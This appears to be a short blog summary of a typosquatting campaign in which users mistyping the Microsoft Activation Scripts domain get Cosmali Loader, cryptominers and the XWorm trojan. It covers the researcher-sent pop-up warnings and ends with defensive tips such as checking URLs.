This article details a recent malware campaign targeting users of the Microsoft Activation Scripts (MAS) project, an open-source tool for activating Windows and Office. Here’s a breakdown of the key information:
* The Scam: Attackers are exploiting a typo in the official MAS activation instructions. Users attempting too activate Windows via PowerShell are being tricked into mistyping “get.activated.win” as “get.activate[.]win”. This leads to infection with the Cosmali Loader malware. * The Malware: cosmali Loader delivers cryptomining utilities and the XWorm remote access trojan (RAT). Critically, the malware’s control panel is insecure, meaning anyone can potentially access infected computers. * The Warning: Users are receiving pop-up warnings claiming thay are infected with Cosmali Loader. These warnings advise a complete Windows reinstall. * Origin of Warnings: It’s believed a security researcher gained access to the malware’s control panel and used it to notify infected users. * MAS Project: MAS is a legitimate, open-source project hosted on GitHub, but Microsoft views it unforably. * How it Works: the attackers rely on the small difference between the legitimate and malicious domain names – a single character – hoping users will make a typo.
In short, users of the MAS project are being targeted by a sophisticated phishing campaign that leverages a simple typo to deliver malware. The recommended solution is a complete Windows reinstall.
Key Takeaways:
* Double-check URLs: Always carefully verify the URLs you are entering, especially when dealing with activation or software installation. * Be wary of pop-up warnings: While the warnings in this case were legitimate, be cautious about acting on pop-up messages without verifying their source. * Understand the risks of unofficial activation tools: Using tools like MAS, while convenient, carries inherent risks as they are not officially supported by Microsoft.
Share this: Click to share on Facebook (Opens in new window) Facebook Click to share on X (Opens in new window) X Related